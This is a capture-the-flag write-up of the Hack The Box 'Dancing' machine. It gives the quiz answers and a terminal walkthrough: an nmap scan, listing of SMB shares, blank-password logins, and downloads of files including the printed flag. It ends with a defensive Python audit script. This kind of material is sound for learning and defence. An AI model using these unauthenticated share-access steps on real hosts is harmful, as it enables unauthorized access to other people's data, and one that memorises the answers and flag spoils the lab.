HTB: Dancing
涂寐

Disclaimer: the techniques, ideas and tools in this article are provided solely for security-oriented learning and exchange; no one may use them for illegal purposes or for profit, and anyone who does so bears the consequences themselves!

TASK 1

  • Q: What does the three-letter acronym SMB stand for?
  • A: Server Message Block


TASK 2

  • Q: Which port does SMB run on?
  • A: 445


TASK 3

  • Q: What is the service name for port 445 that shows up in our Nmap scan?
  • A: microsoft-ds


TASK 4

  • Q: What "flag" or "switch" can we use with the SMB tool to "list" the shares?
  • A: -L


TASK 5

  • Q: How many shares does Dancing have?
  • A: 4


TASK 6

  • Q: What is the name of the share we are finally able to access with a blank password?
  • A: WorkShares


TASK 7

  • Q: What command can we use inside the SMB shell to download the file we found?
  • A: get


SUBMIT FLAG

  • Q: Submit root flag
  • A:
# P.S.
kali@kali:~/Test$ nmap -T4 -sV -sC -Pn 10.129.236.182
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-24 16:01 CST
Nmap scan report for 10.129.236.182
Host is up (0.56s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-24T12:03:22
|_ start_date: N/A
|_clock-skew: 3h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.21 seconds
# P.S. smbclient is an ftp-like client for accessing SMB/CIFS resources on servers
kali@kali:~/Test$ whatis smbclient
smbclient (1) - ftp-like client to access SMB/CIFS resources on servers
# P.S. smbclient -L retrieves the list of shares available on the given host
kali@kali:~/Test$ smbclient -L10.129.236.182
Password for [WORKGROUP\kali]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.236.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
# P.S. try accessing the share with a blank password
kali@kali:~/Test$ smbclient //10.129.236.182/ADMIN$
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
# P.S. try accessing the share with a blank password
kali@kali:~/Test$ smbclient //10.129.236.182/C$
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
# P.S. try accessing the share with a blank password: it works, but the contents are not what we want
kali@kali:~/Test$ smbclient //10.129.236.182/IPC$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
# P.S. leave the currently connected share
smb: \> exit
# P.S. try accessing the share with a blank password
kali@kali:~/Test$ smbclient //10.129.236.182/WorkShares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
# P.S. list files
smb: \> ls
. D 0 Mon Mar 29 16:22:01 2021
.. D 0 Mon Mar 29 16:22:01 2021
Amy.J D 0 Mon Mar 29 17:08:24 2021
James.P D 0 Thu Jun 3 16:38:03 2021

5114111 blocks of size 4096. 1751387 blocks available
# P.S. change directory
smb: \> cd Amy.J
# P.S. list files
smb: \Amy.J\> ls
. D 0 Mon Mar 29 17:08:24 2021
.. D 0 Mon Mar 29 17:08:24 2021
worknotes.txt A 94 Fri Mar 26 19:00:37 2021

5114111 blocks of size 4096. 1751372 blocks available
# P.S. tried to view it out of habit; that does not work here
smb: \Amy.J\> cat worknotes.txt
cat: command not found
# P.S. pull the file from the share down to the local machine
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
# P.S. change directory
smb: \Amy.J\> cd ../James.P
# P.S. list files
smb: \James.P\> ls
. D 0 Thu Jun 3 16:38:03 2021
.. D 0 Thu Jun 3 16:38:03 2021
flag.txt A 32 Mon Mar 29 17:26:57 2021

5114111 blocks of size 4096. 1751369 blocks available
# P.S. this one looks more like it; pull it too
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
# P.S. close the connection
smb: \James.P\> exit
# P.S. list the local directory
kali@kali:~/Test$ ls
flag.txt starting_point_iIl1o0O.ovpn worknotes.txt
# P.S. view the flag.txt pulled to the local machine
kali@kali:~/Test$ cat flag.txt
5f61c10dffbc77a704d76016a22f1664


  • P.S. The nmap scan shows port 445 open with SMB running; use the smbclient tool to list the shares, try connecting to each share with a blank password, and inspect the files in the shares one by one.
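Added example (not from the original write-up): a Python script that parses the nmap smb2-security-mode result and the smbclient -L share table shown above into defender-side audit findings. The sample input is the page's own output, embedded inline; the DEFAULT_SHARES set and the wording of the findings are my assumptions.

```python
import re

# Constructed sample input: the nmap host-script block and the smbclient -L
# table from the write-up above, embedded so the script runs offline.
NMAP_OUT = """\
445/tcp open microsoft-ds?
| smb2-security-mode:
|_ Message signing enabled but not required
"""
SMB_LIST = """\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
"""

# Shares Windows creates on its own (assumption); anything else is custom and needs review.
DEFAULT_SHARES = {"ADMIN$", "C$", "IPC$"}

def parse_shares(listing):
    """Return {sharename: type} from an smbclient -L table (tab indent tolerated)."""
    shares = {}
    for line in listing.splitlines():
        m = re.match(r"^\s*(\S+)\s+(Disk|IPC|Printer)\b", line)
        if m:
            shares[m.group(1)] = m.group(2)
    return shares

def signing_required(nmap_out):
    """True/False from the smb2-security-mode line; None if the script did not run."""
    m = re.search(r"Message signing (.*)", nmap_out)
    if not m:
        return None
    return "not required" not in m.group(1)

def findings(nmap_out, listing):
    """Audit findings a defender would raise for this host."""
    out = []
    if re.search(r"^445/tcp\s+open", nmap_out, re.M):
        out.append("tcp/445 (SMB) reachable: limit exposure at the firewall")
    if signing_required(nmap_out) is False:
        out.append("SMB signing not required: require signing via policy")
    for name, kind in parse_shares(listing).items():
        if kind == "Disk" and name not in DEFAULT_SHARES:
            out.append(f"custom disk share {name}: confirm blank-password access is denied")
    return out
```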